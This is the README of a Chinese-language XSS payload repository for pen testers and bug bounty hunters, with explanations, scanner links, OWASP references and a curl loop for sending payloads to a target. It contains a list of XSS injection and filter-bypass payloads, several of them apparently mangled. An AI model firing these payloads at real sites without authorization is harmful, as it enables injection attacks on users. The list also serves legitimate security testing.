R-S-Nithesh/xss-payload-arsenal

# 💉 XSS Payload 武器库

一个为安全研究人员、渗透测试工程师和漏洞赏金猎人精心整理的跨站脚本攻击 (XSS) 漏洞 Payload 综合集合。

## ⚠️ 免责声明 ## 📖 目录 - [概述](#-overview) - [什么是 XSS？](#-what-is-xss) - [XSS 类型](#-xss-types) - [漏洞扫描工具](#-vulnerability-scanner-tools) - [Payload 列表](#-payload-list) - [参考资料](#-references) - [推荐书籍](#-recommended-books) - [快速开始](#-getting-started) - [贡献指南](#-contributing) - [支持](#-support) ## 🔍 概述 跨站脚本攻击 (XSS) 仍然是最普遍且最危险的 Web 漏洞之一，一直位列 **OWASP Top 10** 之中。本仓库提供了大量的 Payload 列表，旨在协助安全专业人员开展以下工作： - 对 Web 应用程序进行**渗透测试** - 在授权平台上进行**漏洞赏金 (Bug bounty) 狩猎** - 应对 **CTF (Capture The Flag)** 挑战 - 开展**安全意识培训**与研究 ## 🧠 什么是 XSS？ 跨站脚本攻击 (XSS) 是一种**注入攻击**，恶意脚本会被注入到原本安全可信的网站中。 XSS 攻击发生在攻击者利用 Web 应用程序向其他最终用户发送恶意代码（通常以浏览器端脚本的形式）时。由于受害者的浏览器无法判断该脚本不应被信任，因此会执行它。 因为浏览器认为该脚本来自受信任的来源，所以恶意脚本可以： - 访问 **cookies** 和 **session tokens** - 窃取**敏感用户数据** - 重写页面的 **HTML 内容** - 代替用户**执行操作** ## 🗂️ XSS 类型 | 类型 | 描述 | |------|-------------| | **反射型 XSS** | Payload 嵌入在 URL 中，并通过服务器的错误消息、搜索结果或任何其他包含用户提供输入的响应反射出来 | | **存储型 XSS** | Payload 被永久存储在目标服务器上（例如，数据库、留言论坛、评论字段），并在随后被受害者检索 | | **基于 DOM 的 XSS** | Payload 由于修改了受害者浏览器中的 DOM 环境而执行，即客户端脚本本身将数据写入了 DOM | ## 🛠️ 漏洞扫描工具 以下工具可用于在授权测试环境中检测和利用 XSS 漏洞： | 工具 | 类型 | 描述 | |------|------|-------------| | [XSStrike](https://github.com/UltimateHackers/XSStrike) | CLI | 带有模糊测试引擎的高级 XSS 检测套件 | | [BruteXSS Terminal](https://github.com/shawarkhanethicalhacker/BruteXSS) | CLI | 基于终端的暴力 XSS 扫描器 | | [BruteXSS GUI](https://github.com/rajeshmajumdar/BruteXSS) | GUI | BruteXSS 的图形界面版本 | | [XSS Scanner Online](http://xss-scanner.com/) | Web | 在线 XSS 漏洞扫描器 | | [XSSer](https://tools.kali.org/web-applications/xsser) | CLI | Kali Linux 自动化 XSS 框架 | | [xsscrapy](https://github.com/DanMcInerney/xsscrapy) | CLI | XSS 爬虫 —— 能发现 85%+ 的 XSS 漏洞 | | [Cyclops](https://github.com/v8blink/Chromium-based-XSS-Taint-Tracking) | Framework | 基于 Chromium 的 XSS 污点追踪引擎 | ## 🧪 Payload 列表 以下 Payload 涵盖了广泛的 XSS 注入技术，包括： - **基础脚本注入** - **基于事件处理程序的 Payload** (`onload`、`onerror`、`onclick` 等) - **HTML 属性注入** - **编码与混淆 Payload** (URL、十六进制、Unicode、HTML 实体编码) - **过滤器绕过技术** - **基于 SVG/XML 的攻击向量** - **DOM 篡改 Payload** ``` "-prompt(8)-" '-prompt(8)-' ";a=prompt,a()// ';a=prompt,a()// '-eval("window['pro'%2B'mpt'](8)")-' "-eval("window['pro'%2B'mpt'](8)")-" "onclick=prompt(8)>"@x.y "onclick=prompt(8)> t> javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) \x3Cscript>javascript:alert(1) '"`> %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e %253cscript%253ealert(1)%253c/script%253e "> ipt>alert(1)ipt> foo ">alert(document.cookie) =(◕_◕)= var n=0;while(true){n++;}]]> '';!--"=&{()} ]>&xee; <~/XSS STYLE=xss:expression(alert('XSS'))> ">">& "> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' ';alert(String.fromCharCode(88,83,83))//

``` ## 📚 参考资料 ### 跨站脚本攻击 (XSS) — OWASP | 主题 | 链接 | |-------|------| | XSS 概述 | [OWASP: Cross-site Scripting](https://owasp.org/www-community/attacks/xss/) | | XSS 防护备忘单 | [OWASP: XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) | | 基于 DOM 的 XSS 防护 | [OWASP: DOM XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html) | | 测试反射型 XSS | [OWASP: OTG-INPVAL-001](https://owasp.org/www-project-web-security-testing-guide/) | | 测试存储型 XSS | [OWASP: OTG-INPVAL-002](https://owasp.org/www-project-web-security-testing-guide/) | | 测试基于 DOM 的 XSS | [OWASP: OTG-CLIENT-001](https://owasp.org/www-project-web-security-testing-guide/) | | 基于 DOM 的 XSS | [OWASP: DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS) | | Veracode XSS 备忘单 | [Veracode: XSS](https://www.veracode.com/security/xss) | ## 📗 推荐书籍 | 书籍 | 描述 | |------|-------------| | [XSS Attacks: Cross-site Scripting Exploits and Defense](https://books.google.com.tr/books/about/XSS_Attacks.html?id=dPhqDe0WHZ8C) | 关于 XSS 漏洞利用与防御策略的全面指南 | | [XSS Cheat Sheet (LeanPub)](https://leanpub.com/xss) | 为渗透测试工程师编写的简明实用 XSS 参考手册 | ## 🚀 快速开始 ### 通过 HTTPS 克隆 ``` git clone https://github.com/R-S-Nithesh/xss-payload-arsenal.git ``` ### 通过 SSH 克隆 ``` git clone git@github.com:R-S-Nithesh/xss-payload-arsenal.git ``` ### 使用示例 将 Payload 列表与您首选的安全工具结合使用。例如，使用 `curl` 对授权目标进行快速测试： ``` while IFS= read -r payload; do curl -s "https://target.example.com/search?q=${payload}" | grep -q "alert" && echo "[VULNERABLE] $payload" done < xss-payload-list.txt ``` ## 📄 许可证 本项目基于 **MIT License** 授权 —— 详见 [LICENSE](LICENSE) 文件。

标签：Bug Bounty, CISA项目, Cutter, Go语言工具, OWASP Top 10, Payload, Web安全, XSS, 可自定义解析器, 安全测试, 攻击性安全, 攻击路径可视化, 数据展示, 注入攻击, 漏洞情报, 红队, 网络安全, 蓝队分析, 跨站脚本攻击, 防御加固, 隐私保护, 黑客工具, 黑盒测试